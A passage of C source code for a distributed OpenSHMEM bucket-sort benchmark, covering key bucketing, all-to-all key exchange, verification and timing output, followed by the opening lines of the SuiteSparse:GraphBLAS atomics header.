return my_keys;
}
#if defined(_SHMEM_WORKERS)
void count_local_bucket_sizes_async(void* args, int chunk) {
KEY_TYPE const * restrict const my_keys = (KEY_TYPE *) args;
local_bucket_sizes_chunk[chunk] = malloc(NUM_BUCKETS * sizeof(int));
memset(local_bucket_sizes_chunk[chunk], 0x00, NUM_BUCKETS * sizeof(int));
int * restrict const local_bucket_sizes = local_bucket_sizes_chunk[chunk];
const uint32_t keys_per_chunk = NUM_KEYS_PER_PE / CHUNKS_PER_PE;
const uint32_t start_index = chunk * keys_per_chunk;
KEY_TYPE const * restrict const my_keys_1D = &(my_keys[start_index]);
for(uint64_t i = 0; i < keys_per_chunk; ++i){
const uint32_t bucket_index = my_keys_1D[i]/BUCKET_WIDTH;
local_bucket_sizes[bucket_index]++;
}
}
#endif
/*
* Computes the size of each bucket by iterating all keys and incrementing
* their corresponding bucket's size
*/
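/* e.g., with BUCKET_WIDTH = 16, key 37 is counted in bucket 37/16 = 2 */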
static inline int * count_local_bucket_sizes(KEY_TYPE const * restrict const my_keys)
{
int * restrict const local_bucket_sizes = malloc(NUM_BUCKETS * sizeof(int));
memset(local_bucket_sizes, 0x00, NUM_BUCKETS * sizeof(int));
timer_start(&timers[TIMER_BCOUNT]);
init_array(local_bucket_sizes, NUM_BUCKETS);
if(NUM_BUCKETS == 1) {
local_bucket_sizes[0] = NUM_KEYS_PER_PE;
}
else {
#if defined(_SHMEM_WORKERS)
int lowBound = 0;
int highBound = CHUNKS_PER_PE;
int stride = 1;
int tile_size = 1;
int loop_dimension = 1;
shmem_task_scope_begin();
shmem_parallel_for_nbi(count_local_bucket_sizes_async, (void*)(my_keys), NULL, lowBound, highBound, stride, tile_size, loop_dimension, SHMEM_PARALLEL_FOR_FLAT_MODE);
shmem_task_scope_end();
#else
int chunk;
#if defined(_OPENMP)
#pragma omp parallel for private(chunk) schedule (dynamic,1)
#endif
for(chunk=0; chunk<CHUNKS_PER_PE; chunk++) {
local_bucket_sizes_chunk[chunk] = malloc(NUM_BUCKETS * sizeof(int));
memset(local_bucket_sizes_chunk[chunk], 0x00, NUM_BUCKETS * sizeof(int));
int * restrict const local_bucket_sizes = local_bucket_sizes_chunk[chunk];
const uint32_t keys_per_chunk = NUM_KEYS_PER_PE / CHUNKS_PER_PE;
const uint32_t start_index = chunk * keys_per_chunk;
KEY_TYPE const * restrict const my_keys_1D = &(my_keys[start_index]);
for(uint64_t i = 0; i < keys_per_chunk; ++i){
const uint32_t bucket_index = my_keys_1D[i]/BUCKET_WIDTH;
local_bucket_sizes[bucket_index]++;
}
}
#endif
for(int chunk=0; chunk<CHUNKS_PER_PE; chunk++) {
for(int i=0; i<NUM_BUCKETS; i++) {
local_bucket_sizes[i] += local_bucket_sizes_chunk[chunk][i];
}
}
}
timer_stop(&timers[TIMER_BCOUNT]);
#ifdef DEBUG
wait_my_turn();
char msg[1024];
const int my_rank = shmem_my_pe();
sprintf(msg,"Rank %d: local bucket sizes: ", my_rank);
for(uint64_t i = 0; i < NUM_BUCKETS; ++i){
if(i < PRINT_MAX)
sprintf(msg + strlen(msg),"%d ", local_bucket_sizes[i]);
}
sprintf(msg + strlen(msg),"\n");
printf("%s",msg);
fflush(stdout);
my_turn_complete();
#endif
return local_bucket_sizes;
}
/*
* Computes the prefix scan of the bucket sizes to determine the starting locations
* of each bucket in the local bucketed array
* Stores a copy of the bucket offsets for use in exchanging keys because the
* original bucket_offsets array is modified in the bucketize function
*/
static inline int * compute_local_bucket_offsets(int const * restrict const local_bucket_sizes,
int ** restrict send_offsets)
{
int * restrict const local_bucket_offsets = malloc(NUM_BUCKETS * sizeof(int));
timer_start(&timers[TIMER_BOFFSET]);
(*send_offsets) = malloc(NUM_BUCKETS * sizeof(int));
// NOTE: This is a very small computation and hence we are not parallelizing this
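// Exclusive prefix sum: e.g. bucket sizes {3, 1, 2} give offsets {0, 3, 4}.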
local_bucket_offsets[0] = 0;
(*send_offsets)[0] = 0;
int temp = 0;
for(uint64_t i = 1; i < NUM_BUCKETS; i++){
temp = local_bucket_offsets[i-1] + local_bucket_sizes[i-1];
local_bucket_offsets[i] = temp;
(*send_offsets)[i] = temp;
}
timer_stop(&timers[TIMER_BOFFSET]);
#ifdef DEBUG
wait_my_turn();
char msg[1024];
const int my_rank = shmem_my_pe();
sprintf(msg,"Rank %d: local bucket offsets: ", my_rank);
for(uint64_t i = 0; i < NUM_BUCKETS; ++i){
if(i < PRINT_MAX)
sprintf(msg + strlen(msg),"%d ", local_bucket_offsets[i]);
}
sprintf(msg + strlen(msg),"\n");
printf("%s",msg);
fflush(stdout);
my_turn_complete();
#endif
return local_bucket_offsets;
}
#if defined(_SHMEM_WORKERS)
void bucketize_local_keys_async(void* args, int chunk) {
KEY_TYPE const * restrict const my_keys = (KEY_TYPE*) args;
my_local_bucketed_keys_chunk[chunk] = malloc(NUM_BUCKETS * sizeof(KEY_TYPE*));
local_bucket_offsets_chunk[chunk] = malloc(NUM_BUCKETS * sizeof(int));
memset(local_bucket_offsets_chunk[chunk], 0x00, NUM_BUCKETS * sizeof(int));
for(int bucket=0; bucket<NUM_BUCKETS; bucket++) {
my_local_bucketed_keys_chunk[chunk][bucket] = malloc(sizeof(KEY_TYPE) * local_bucket_sizes_chunk[chunk][bucket]);
}
const uint32_t keys_per_chunk = NUM_KEYS_PER_PE / CHUNKS_PER_PE;
const uint32_t start_index = chunk * keys_per_chunk;
KEY_TYPE const * restrict const my_keys_1D = &(my_keys[start_index]);
int * restrict local_bucket_offsets_chunk_1D = local_bucket_offsets_chunk[chunk];
int const * restrict const local_bucket_sizes_chunk_1D = local_bucket_sizes_chunk[chunk];
KEY_TYPE** restrict my_local_bucketed_keys_chunk_2D = my_local_bucketed_keys_chunk[chunk];
for(uint64_t i = 0; i < keys_per_chunk; ++i){
const KEY_TYPE key = my_keys_1D[i];
const uint32_t bucket_index = key / BUCKET_WIDTH;
uint32_t index = local_bucket_offsets_chunk_1D[bucket_index]++;
assert(index < local_bucket_sizes_chunk_1D[bucket_index]);
my_local_bucketed_keys_chunk_2D[bucket_index][index] = key;
}
}
#endif
/*
* Places local keys into their corresponding local bucket.
* The contents of each bucket are not sorted.
*/
static inline KEY_TYPE * bucketize_local_keys(KEY_TYPE const * restrict const my_keys,
int * restrict const local_bucket_offsets)
{
KEY_TYPE * restrict const my_local_bucketed_keys = malloc(NUM_KEYS_PER_PE * sizeof(KEY_TYPE));
timer_start(&timers[TIMER_BUCKETIZE]);
my_local_bucketed_keys_chunk = malloc(CHUNKS_PER_PE* sizeof(KEY_TYPE**));
local_bucket_offsets_chunk = (int**) malloc(CHUNKS_PER_PE* sizeof(int*));
#if defined(_SHMEM_WORKERS)
int lowBound = 0;
int highBound = CHUNKS_PER_PE;
int stride = 1;
int tile_size = 1;
int loop_dimension = 1;
shmem_task_scope_begin();
shmem_parallel_for_nbi(bucketize_local_keys_async, (void*)(my_keys), NULL, lowBound, highBound, stride, tile_size, loop_dimension, SHMEM_PARALLEL_FOR_FLAT_MODE);
shmem_task_scope_end();
#else
int chunk;
#if defined(_OPENMP)
#pragma omp parallel for private(chunk) schedule (dynamic,1)
#endif
for(chunk=0; chunk<CHUNKS_PER_PE; chunk++) {
my_local_bucketed_keys_chunk[chunk] = malloc(NUM_BUCKETS * sizeof(KEY_TYPE*));
local_bucket_offsets_chunk[chunk] = malloc(NUM_BUCKETS * sizeof(int));
memset(local_bucket_offsets_chunk[chunk], 0x00, NUM_BUCKETS * sizeof(int));
for(int bucket=0; bucket<NUM_BUCKETS; bucket++) {
my_local_bucketed_keys_chunk[chunk][bucket] = malloc(sizeof(KEY_TYPE) * local_bucket_sizes_chunk[chunk][bucket]);
}
const uint32_t keys_per_chunk = NUM_KEYS_PER_PE / CHUNKS_PER_PE;
const uint32_t start_index = chunk * keys_per_chunk;
KEY_TYPE const * restrict const my_keys_1D = &(my_keys[start_index]);
int * restrict local_bucket_offsets_chunk_1D = local_bucket_offsets_chunk[chunk];
int const * restrict const local_bucket_sizes_chunk_1D = local_bucket_sizes_chunk[chunk];
KEY_TYPE** restrict my_local_bucketed_keys_chunk_2D = my_local_bucketed_keys_chunk[chunk];
for(uint64_t i = 0; i < keys_per_chunk; ++i){
const KEY_TYPE key = my_keys_1D[i];
const uint32_t bucket_index = key / BUCKET_WIDTH;
uint32_t index = local_bucket_offsets_chunk_1D[bucket_index]++;
assert(index < local_bucket_sizes_chunk_1D[bucket_index]);
my_local_bucketed_keys_chunk_2D[bucket_index][index] = key;
}
}
#endif
for(int bucket=0; bucket<NUM_BUCKETS; bucket++) {
uint32_t index = local_bucket_offsets[bucket];
for(int chunk=0; chunk<CHUNKS_PER_PE; chunk++) {
memcpy(&(my_local_bucketed_keys[index]), my_local_bucketed_keys_chunk[chunk][bucket], sizeof(KEY_TYPE) * local_bucket_sizes_chunk[chunk][bucket]);
index += local_bucket_sizes_chunk[chunk][bucket];
}
local_bucket_offsets[bucket] = index;
}
// free the memory
for(int chunk=0; chunk<CHUNKS_PER_PE; chunk++) {
for(int bucket=0; bucket<NUM_BUCKETS; bucket++) {
free(my_local_bucketed_keys_chunk[chunk][bucket]);
}
free(local_bucket_offsets_chunk[chunk]);
free(my_local_bucketed_keys_chunk[chunk]);
}
free(my_local_bucketed_keys_chunk);
free(local_bucket_offsets_chunk);
timer_stop(&timers[TIMER_BUCKETIZE]);
#ifdef DEBUG
wait_my_turn();
char msg[1024];
const int my_rank = shmem_my_pe();
sprintf(msg,"Rank %d: local bucketed keys: ", my_rank);
for(uint64_t i = 0; i < NUM_KEYS_PER_PE; ++i){
if(i < PRINT_MAX)
sprintf(msg + strlen(msg),"%d ", my_local_bucketed_keys[i]);
}
sprintf(msg + strlen(msg),"\n");
printf("%s",msg);
fflush(stdout);
my_turn_complete();
#endif
return my_local_bucketed_keys;
}
#if defined(_SHMEM_WORKERS)
typedef struct exchange_keys_async_t {
KEY_TYPE const * restrict const my_local_bucketed_keys;
const long long int max_bucket_size;
const long long int send_offsets_start;
const long long int write_offset_into_self;
} exchange_keys_async_t;
void exchange_keys_async(void* args, int chunk) {
exchange_keys_async_t* arg = (exchange_keys_async_t*) args;
KEY_TYPE const * restrict const my_local_bucketed_keys = arg->my_local_bucketed_keys;
const long long int max_bucket_size = arg->max_bucket_size;
const long long int send_offsets_start = arg->send_offsets_start;
const long long int write_offset_into_self = arg->write_offset_into_self;
const long long int chunks = max_bucket_size / actual_num_workers;
const long long int write_offset_into_self_worker = write_offset_into_self + (chunk * chunks);
const long long int send_offsets_start_worker = send_offsets_start + (chunk * chunks);
long long int send_size = chunks;
if(chunk+1 == actual_num_workers) {
long long int leftover = max_bucket_size - (chunks * actual_num_workers);
send_size += leftover;
}
memcpy(&my_bucket_keys[write_offset_into_self_worker],&my_local_bucketed_keys[send_offsets_start_worker],
send_size*sizeof(KEY_TYPE));
}
#endif
/*
* Each PE sends the contents of its local buckets to the PE that owns that bucket.
*/
static inline KEY_TYPE * exchange_keys(int const * restrict const send_offsets,
int const * restrict const local_bucket_sizes,
KEY_TYPE const * restrict const my_local_bucketed_keys)
{
timer_start(&timers[TIMER_ATA_KEYS]);
const int my_rank = shmem_my_pe();
unsigned int total_keys_sent = 0;
for(uint64_t i = 0; i < NUM_PES; ++i){
#ifdef PERMUTE
const int target_pe = permute_array[i];
#elif INCAST
const int target_pe = i;
#else
const int target_pe = (my_rank + i) % NUM_PES;
#endif
// Local keys already written with memcpy
if(target_pe == my_rank){ continue; }
const int read_offset_from_self = send_offsets[target_pe];
const int my_send_size = local_bucket_sizes[target_pe];
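// The atomic fetch-and-add on the target PE's receive_offset reserves a
// contiguous window in its key buffer, so concurrent senders never
// overlap; the put below writes this PE's bucket into that window.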
const long long int write_offset_into_target = shmem_longlong_fadd(&receive_offset, (long long int)my_send_size, target_pe);
shmem_int_put(&(my_bucket_keys[write_offset_into_target]),
&(my_local_bucketed_keys[read_offset_from_self]),
my_send_size, target_pe);
#ifdef DEBUG
printf("Rank: %d Target: %d Offset into target: %lld Offset into myself: %d Send Size: %d\n",
my_rank, target_pe, write_offset_into_target, read_offset_from_self, my_send_size);
#endif
total_keys_sent += my_send_size;
}
// Keys destined for local key buffer can be written with memcpy
const long long int write_offset_into_self = shmem_longlong_fadd(&receive_offset, (long long int)local_bucket_sizes[my_rank], my_rank);
const long long int send_offsets_start = send_offsets[my_rank];
const long long int chunks = local_bucket_sizes[my_rank] / actual_num_workers;
const long long int max_bucket_size = local_bucket_sizes[my_rank];
#if defined(_SHMEM_WORKERS)
int lowBound = 0;
int highBound = actual_num_workers;
int stride = 1;
int tile_size = 1;
int loop_dimension = 1;
exchange_keys_async_t args = {my_local_bucketed_keys, max_bucket_size, send_offsets_start, write_offset_into_self};
shmem_task_scope_begin();
shmem_parallel_for_nbi(exchange_keys_async, (void*)(&args), NULL, lowBound, highBound, stride, tile_size, loop_dimension, SHMEM_PARALLEL_FOR_FLAT_MODE);
shmem_task_scope_end();
#else
int chunk;
#if defined(_OPENMP)
#pragma omp parallel for private(chunk) schedule (dynamic,1)
#endif
for(chunk=0; chunk<actual_num_workers; chunk++) {
const long long int write_offset_into_self_worker = write_offset_into_self + (chunk * chunks);
const long long int send_offsets_start_worker = send_offsets_start + (chunk * chunks);
long long int send_size = chunks;
if(chunk+1 == actual_num_workers) {
long long int leftover = max_bucket_size - (chunks * actual_num_workers);
send_size += leftover;
}
memcpy(&my_bucket_keys[write_offset_into_self_worker],&my_local_bucketed_keys[send_offsets_start_worker],
send_size*sizeof(KEY_TYPE));
}
#endif
#ifdef BARRIER_ATA
SHMEM_BARRIER_AT_EXCHANGE;
#endif
timer_stop(&timers[TIMER_ATA_KEYS]);
timer_count(&timers[TIMER_ATA_KEYS], total_keys_sent);
#ifdef DEBUG
wait_my_turn();
char msg[1024];
sprintf(msg,"Rank %d: Bucket Size %lld | Total Keys Sent: %u | Keys after exchange:",
my_rank, receive_offset, total_keys_sent);
for(long long int i = 0; i < receive_offset; ++i){
if(i < PRINT_MAX)
sprintf(msg + strlen(msg),"%d ", my_bucket_keys[i]);
}
sprintf(msg + strlen(msg),"\n");
printf("%s",msg);
fflush(stdout);
my_turn_complete();
#endif
return my_bucket_keys;
}
#if defined(_SHMEM_WORKERS)
typedef struct count_local_keys_async_t {
int max_chunks;
int my_min_key;
} count_local_keys_async_t;
void count_local_keys_async(void* args, int chunk) {
count_local_keys_async_t* arg = (count_local_keys_async_t*) args;
const int max_chunks = arg->max_chunks;
const int my_min_key = arg->my_min_key;
const int start_index = chunk * max_chunks;
int * restrict my_local_key_counts_1D = my_local_key_counts[chunk];
int const * restrict const my_bucket_keys_1D = &(my_bucket_keys[start_index]);
for(int i=0; i<max_chunks; i++) {
const unsigned int key_index = my_bucket_keys_1D[i] - my_min_key;
assert(my_bucket_keys_1D[i] >= my_min_key);
assert(key_index < BUCKET_WIDTH);
my_local_key_counts_1D[key_index]++;
}
}
#endif
/*
* Counts the occurrence of each key in my bucket.
* Key indices into the count array are the key's value minus my bucket's
* minimum key value to allow indexing from 0.
* my_bucket_keys: All keys in my bucket unsorted [my_rank * BUCKET_WIDTH, (my_rank+1)*BUCKET_WIDTH)
*/
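/* e.g., PE 2 with BUCKET_WIDTH = 16 owns keys [32, 48), so key 37
   increments count index 37 - 32 = 5 */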
static inline int* count_local_keys(KEY_TYPE const * restrict const my_bucket_keys)
{
timer_start(&timers[TIMER_SORT]);
const int my_rank = shmem_my_pe();
const int my_min_key = my_rank * BUCKET_WIDTH;
const int max_chunks = (int) my_bucket_size / actual_num_workers;
#if defined(_SHMEM_WORKERS)
int lowBound = 0;
int highBound = CHUNKS_COUNT_LOCAL_KEYS;
int stride = 1;
int tile_size = 1;
int loop_dimension = 1;
count_local_keys_async_t args = {max_chunks, my_min_key};
shmem_task_scope_begin();
shmem_parallel_for_nbi(count_local_keys_async, (void*)(&args), NULL, lowBound, highBound, stride, tile_size, loop_dimension, SHMEM_PARALLEL_FOR_FLAT_MODE);
shmem_task_scope_end();
#else
int chunk;
#if defined(_OPENMP)
#pragma omp parallel for private(chunk) schedule (static,1)
#endif
for(chunk=0; chunk<CHUNKS_COUNT_LOCAL_KEYS; chunk++) {
const int start_index = chunk * max_chunks;
int * restrict my_local_key_counts_1D = my_local_key_counts[chunk];
int const * restrict const my_bucket_keys_1D = &(my_bucket_keys[start_index]);
for(int i=0; i<max_chunks; i++) {
const unsigned int key_index = my_bucket_keys_1D[i] - my_min_key;
assert(my_bucket_keys_1D[i] >= my_min_key);
assert(key_index < BUCKET_WIDTH);
my_local_key_counts_1D[key_index]++;
}
}
#endif
//sequential part here
const int leftover = my_bucket_size - (max_chunks * CHUNKS_COUNT_LOCAL_KEYS);
if(leftover) {
const int chunk = CHUNKS_COUNT_LOCAL_KEYS - 1;
for(int i=(my_bucket_size-leftover); i<my_bucket_size; i++) {
const unsigned int key_index = my_bucket_keys[i] - my_min_key;
assert(my_bucket_keys[i] >= my_min_key);
assert(key_index < BUCKET_WIDTH);
my_local_key_counts[chunk][key_index]++;
}
}
timer_stop(&timers[TIMER_SORT]);
#ifdef DEBUG
wait_my_turn();
char msg[4096];
sprintf(msg,"Rank %d: Bucket Size %lld | Local Key Counts:", my_rank, my_bucket_size);
for(int chunk=0; chunk<actual_num_workers; chunk++) {
for(uint64_t i = 0; i < BUCKET_WIDTH; ++i){
if(i < PRINT_MAX)
sprintf(msg + strlen(msg),"%d ", my_local_key_counts[chunk][i]);
}
}
sprintf(msg + strlen(msg),"\n");
printf("%s",msg);
fflush(stdout);
my_turn_complete();
#endif
return NULL;
}
typedef struct verify_results_async_t {
int max_chunks;
int my_min_key;
int my_max_key;
} verify_results_async_t;
void verify_results_async(void* args, int chunk) {
verify_results_async_t* arg = (verify_results_async_t*) args;
const int max_chunks = arg->max_chunks;
const int my_min_key = arg->my_min_key;
const int my_max_key = arg->my_max_key;
const int start_index = chunk * max_chunks;
const int max_index = start_index + max_chunks;
for(int i=start_index; i<max_index; i++) {
const int key = my_bucket_keys[i];
if((key < my_min_key) || (key > my_max_key)){
printf("Rank %d Failed Verification!\n",shmem_my_pe());
printf("Key: %d is outside of bounds [%d, %d]\n", key, my_min_key, my_max_key);
}
}
}
/*
* Verifies the correctness of the sort.
* Ensures all keys are within a PE's bucket boundaries.
* Ensures the final number of keys is equal to the initial.
*/
static int verify_results(KEY_TYPE const * restrict const my_local_keys)
{
shmem_barrier_all();
int error = 0;
const int my_rank = shmem_my_pe();
const int my_min_key = my_rank * BUCKET_WIDTH;
const int my_max_key = (my_rank+1) * BUCKET_WIDTH - 1;
const int max_chunks = (int) my_bucket_size / actual_num_workers;
#if defined(_SHMEM_WORKERS)
int lowBound = 0;
int highBound = actual_num_workers;
int stride = 1;
int tile_size = 1;
int loop_dimension = 1;
verify_results_async_t args = {max_chunks, my_min_key, my_max_key};
shmem_task_scope_begin();
shmem_parallel_for_nbi(verify_results_async, (void*)(&args), NULL, lowBound, highBound, stride, tile_size, loop_dimension, SHMEM_PARALLEL_FOR_FLAT_MODE);
shmem_task_scope_end();
#else
int chunk;
#if defined(_OPENMP)
#pragma omp parallel for private(chunk) schedule (static,1)
#endif
// Verify all keys are within bucket boundaries
for(chunk=0; chunk<actual_num_workers; chunk++) {
const int start_index = chunk * max_chunks;
const int max_index = start_index + max_chunks;
for(int i=start_index; i<max_index; i++) {
const int key = my_bucket_keys[i];
if((key < my_min_key) || (key > my_max_key)){
printf("Rank %d Failed Verification!\n",shmem_my_pe());
printf("Key: %d is outside of bounds [%d, %d]\n", key, my_min_key, my_max_key);
}
}
}
#endif
//sequential part here
const int leftover = my_bucket_size - (max_chunks * actual_num_workers);
if(leftover) {
for(int i=(my_bucket_size-leftover); i<my_bucket_size; i++) {
const int key = my_local_keys[i];
if((key < my_min_key) || (key > my_max_key)){
printf("Rank %d Failed Verification!\n",my_rank);
printf("Key: %d is outside of bounds [%d, %d]\n", key, my_min_key, my_max_key);
error = 1;
}
}
}
// Verify the sum of the key population equals the expected bucket size
long long int bucket_size_test = 0;
for(int chunk=0; chunk<CHUNKS_COUNT_LOCAL_KEYS; chunk++) {
for(uint64_t i = 0; i < BUCKET_WIDTH; ++i){
bucket_size_test += my_local_key_counts[chunk][i];
}
}
if(bucket_size_test != my_bucket_size){
printf("Rank %d Failed Verification!\n",my_rank);
printf("Actual Bucket Size: %lld Should be %lld\n", bucket_size_test, my_bucket_size);
error = 1;
}
// Verify the final number of keys equals the initial number of keys
static long long int total_num_keys = 0;
shmem_longlong_sum_to_all(&total_num_keys, &my_bucket_size, 1, 0, 0, NUM_PES, llWrk, pSync);
shmem_barrier_all();
if(total_num_keys != (long long int)(NUM_KEYS_PER_PE * NUM_PES)){
if(my_rank == ROOT_PE){
printf("Verification Failed!\n");
printf("Actual total number of keys: %lld Expected %" PRIu64 "\n", total_num_keys, NUM_KEYS_PER_PE * NUM_PES );
error = 1;
}
}
return error;
}
/*
* Gathers all the timing information from each PE and prints
* it to a file. All information from a PE is printed as a row in a tab separated file
*/
static void log_times(char * log_file)
{
FILE * fp = NULL;
for(uint64_t i = 0; i < TIMER_NTIMERS; ++i){
timers[i].all_times = gather_rank_times(&timers[i]);
timers[i].all_counts = gather_rank_counts(&timers[i]);
}
if(shmem_my_pe() == ROOT_PE)
{
int print_names = 0;
if(file_exists(log_file) != 1){
print_names = 1;
}
if((fp = fopen(log_file, "a+b"))==NULL){
perror("Error opening log file:");
exit(1);
}
if(print_names == 1){
print_run_info(fp);
print_timer_names(fp);
}
print_timer_values(fp);
report_summary_stats();
fclose(fp);
}
}
/*
* Computes the average total time and average all2all time and prints it to the command line
*/
static void report_summary_stats(void)
{
if(timers[TIMER_TOTAL].seconds_iter > 0) {
const uint32_t num_records = NUM_PES * timers[TIMER_TOTAL].seconds_iter;
double temp = 0.0;
for(uint64_t i = 0; i < num_records; ++i){
temp += timers[TIMER_TOTAL].all_times[i];
}
#ifdef EXTRA_STATS
avg_time = temp/num_records;
#endif
printf("Average total time (per PE): %f seconds\n", temp/num_records);
}
if(timers[TIMER_ATA_KEYS].seconds_iter >0) {
const uint32_t num_records = NUM_PES * timers[TIMER_ATA_KEYS].seconds_iter;
double temp = 0.0;
for(uint64_t i = 0; i < num_records; ++i){
temp += timers[TIMER_ATA_KEYS].all_times[i];
}
#ifdef EXTRA_STATS
avg_time_all2all = temp/num_records;
#endif
printf("Average all2all time (per PE): %f seconds\n", temp/num_records);
}
}
/*
* Prints all the labels for each timer as a row to the file specified by 'fp'
*/
static void print_timer_names(FILE * fp)
{
for(uint64_t i = 0; i < TIMER_NTIMERS; ++i){
if(timers[i].seconds_iter > 0){
fprintf(fp, "%s (sec)\t", timer_names[i]);
}
if(timers[i].count_iter > 0){
fprintf(fp, "%s_COUNTS\t", timer_names[i]);
}
}
fprintf(fp,"\n");
}
/*
* Prints all the relevant runtime parameters as a row to the file specified by 'fp'
*/
static void print_run_info(FILE * fp)
{
fprintf(fp,"SHMEM\t");
fprintf(fp,"NUM_PES %" PRIu64 "\t", NUM_PES);
fprintf(fp,"Max_Key %" PRIu64 "\t", MAX_KEY_VAL);
fprintf(fp,"Num_Iters %u\t", NUM_ITERATIONS);
switch(SCALING_OPTION){
case STRONG: {
fprintf(fp,"Strong Scaling: %" PRIu64 " total keys\t", NUM_KEYS_PER_PE * NUM_PES);
break;
}
case WEAK: {
fprintf(fp,"Weak Scaling: %" PRIu64 " keys per PE\t", NUM_KEYS_PER_PE);
break;
}
case WEAK_ISOBUCKET: {
fprintf(fp,"Weak Scaling Constant Bucket Width: %" PRIu64 "u keys per PE \t", NUM_KEYS_PER_PE);
fprintf(fp,"Constant Bucket Width: %" PRIu64 "\t", BUCKET_WIDTH);
break;
}
default:
{
fprintf(fp,"Invalid Scaling Option!\t");
break;
}
}
#ifdef PERMUTE
fprintf(fp,"Randomized All2All\t");
#elif INCAST
fprintf(fp,"Incast All2All\t");
#else
fprintf(fp,"Round Robin All2All\t");
#endif
fprintf(fp,"\n");
}
/*
 * Prints all of the timing information for an individual PE as a row
 * to the file specified by 'fp'.
*/
static void print_timer_values(FILE * fp)
{
unsigned int num_records = NUM_PES * NUM_ITERATIONS;
for(uint64_t i = 0; i < num_records; ++i) {
for(int t = 0; t < TIMER_NTIMERS; ++t){
if(timers[t].all_times != NULL){
fprintf(fp,"%f\t", timers[t].all_times[i]);
}
if(timers[t].all_counts != NULL){
fprintf(fp,"%u\t", timers[t].all_counts[i]);
}
}
fprintf(fp,"\n");
}
}
/*
* Aggregates the per PE timing information
*/
static double * gather_rank_times(_timer_t * const timer)
{
if(timer->seconds_iter > 0) {
assert(timer->seconds_iter == timer->num_iters);
const unsigned int num_records = NUM_PES * timer->seconds_iter;
#ifdef OPENSHMEM_COMPLIANT
double * my_times = shmem_malloc(timer->seconds_iter * sizeof(double));
#else
double * my_times = shmalloc(timer->seconds_iter * sizeof(double));
#endif
memcpy(my_times, timer->seconds, timer->seconds_iter * sizeof(double));
#ifdef OPENSHMEM_COMPLIANT
double * all_times = shmem_malloc( num_records * sizeof(double));
#else
double * all_times = shmalloc( num_records * sizeof(double));
#endif
shmem_barrier_all();
shmem_fcollect64(all_times, my_times, timer->seconds_iter, 0, 0, NUM_PES, pSync);
shmem_barrier_all();
#ifdef OPENSHMEM_COMPLIANT
shmem_free(my_times);
#else
shfree(my_times);
#endif
return all_times;
}
else{
return NULL;
}
}
/*
* Aggregates the per PE timing 'count' information
*/
static unsigned int * gather_rank_counts(_timer_t * const timer)
{
if(timer->count_iter > 0){
const unsigned int num_records = NUM_PES * timer->num_iters;
#ifdef OPENSHMEM_COMPLIANT
unsigned int * my_counts = shmem_malloc(timer->num_iters * sizeof(unsigned int));
#else
unsigned int * my_counts = shmalloc(timer->num_iters * sizeof(unsigned int));
#endif
memcpy(my_counts, timer->count, timer->num_iters*sizeof(unsigned int));
#ifdef OPENSHMEM_COMPLIANT
unsigned int * all_counts = shmem_malloc( num_records * sizeof(unsigned int) );
#else
unsigned int * all_counts = shmalloc( num_records * sizeof(unsigned int) );
#endif
shmem_barrier_all();
shmem_collect32(all_counts, my_counts, timer->num_iters, 0, 0, NUM_PES, pSync);
shmem_barrier_all();
#ifdef OPENSHMEM_COMPLIANT
shmem_free(my_counts);
#else
shfree(my_counts);
#endif
return all_counts;
}
else{
return NULL;
}
}
/*
 * Seeds the RNG for each chunk from the PE's virtual rank (a function of the rank and chunk number)
*/
static inline pcg32_random_t seed_my_chunk(int chunk)
{
const unsigned int my_rank = shmem_my_pe();
const unsigned int my_virtual_rank = GET_VIRTUAL_RANK(my_rank, chunk);
pcg32_random_t rng;
pcg32_srandom_r(&rng, (uint64_t) my_virtual_rank, (uint64_t) my_virtual_rank );
return rng;
}
/*
 * Seeds the RNG for each rank from the rank number
*/
static inline pcg32_random_t seed_my_rank(void)
{
const unsigned int my_rank = shmem_my_pe();
pcg32_random_t rng;
pcg32_srandom_r(&rng, (uint64_t) my_rank, (uint64_t) my_rank );
return rng;
}
/*
* Initializes the work array required for SHMEM collective functions
*/
static void init_shmem_sync_array(long * restrict const pSync)
{
for(uint64_t i = 0; i < _SHMEM_REDUCE_SYNC_SIZE; ++i){
pSync[i] = _SHMEM_SYNC_VALUE;
}
shmem_barrier_all();
}
/*
* Tests whether or not a file exists.
* Returns 1 if file exists
* Returns 0 if file does not exist
*/
static int file_exists(char * filename)
{
struct stat buffer;
if(stat(filename,&buffer) == 0){
return 1;
}
else {
return 0;
}
}
#ifdef DEBUG
static void wait_my_turn()
{
shmem_barrier_all();
whose_turn = 0;
shmem_barrier_all();
const int my_rank = shmem_my_pe();
shmem_int_wait_until((int*)&whose_turn, SHMEM_CMP_EQ, my_rank);
sleep(1);
}
static void my_turn_complete()
{
const int my_rank = shmem_my_pe();
const int next_rank = my_rank+1;
if(my_rank < (NUM_PES-1)){ // Last rank updates no one
shmem_int_put((int *) &whose_turn, &next_rank, 1, next_rank);
}
shmem_barrier_all();
}
#endif
#ifdef PERMUTE
/*
* Creates a randomly ordered array of PEs used in the exchange_keys function
*/
static void create_permutation_array()
{
permute_array = (int *) malloc( NUM_PES * sizeof(int) );
for(uint64_t i = 0; i < NUM_PES; ++i){
permute_array[i] = i;
}
shuffle(permute_array, NUM_PES, sizeof(int));
}
/*
* Randomly shuffles a generic array
*/
static void shuffle(void * array, size_t n, size_t size)
{
char tmp[size];
char * arr = array;
size_t stride = size * sizeof(char);
if(n > 1){
  // Fisher-Yates shuffle: swap element i with an element j drawn
  // (nearly) uniformly from [i, n-1]; dividing rand() by
  // (RAND_MAX/(n - i) + 1) avoids the modulo bias of rand() % (n - i)
  for(size_t i = 0; i < (n - 1); ++i){
    size_t rnd = (size_t) rand();
    size_t j = i + rnd/(RAND_MAX/(n - i) + 1);
memcpy(tmp, arr + j*stride, size);
memcpy(arr + j*stride, arr + i*stride, size);
memcpy(arr + i*stride, tmp, size);
}
}
}
#endif
|
GB_atomics.h | //------------------------------------------------------------------------------
// GB_atomics.h: definitions for atomic operations
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2020, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// All atomic operations used by SuiteSparse:GraphBLAS appear in this file.
// These atomic operations assume either an ANSI C11 compiler that supports
// OpenMP 4.0 or later, or Microsoft Visual Studio on 64-bit Windows (which
// only supports OpenMP 2.0). SuiteSparse:GraphBLAS is not supported on 32-bit
// Windows.
#ifndef GB_ATOMICS_H
#define GB_ATOMICS_H
#include "GB.h"
#if GB_MICROSOFT
#include <intrin.h>
#endif
//------------------------------------------------------------------------------
// atomic updates
//------------------------------------------------------------------------------
// Whenever possible, the OpenMP pragma is used with a clause (as introduced in
// OpenMP 3.0), as follows:
